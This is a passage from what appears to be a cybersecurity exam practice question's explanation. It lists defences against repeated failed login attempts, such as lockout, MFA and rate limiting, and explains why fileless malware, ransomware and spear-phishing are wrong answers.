Mitigation includes account lockout policies, enforcing strong passwords, requiring multi-factor authentication (MFA), rate-limiting login attempts, and integrating threat intelligence feeds to block malicious IP addresses. Continuous monitoring and alerting allow rapid response to active attacks, reducing risk of compromise.

B Fileless malware executing in memory

Fileless malware does not typically manifest as repeated failed login attempts targeting multiple privileged accounts.

C Ransomware encrypting files

Ransomware focuses on encrypting data rather than repeated failed login attempts.

D Spear-phishing targeting executives

Spear-phishing relies on social engineering rather than automated login attempts across multiple accounts.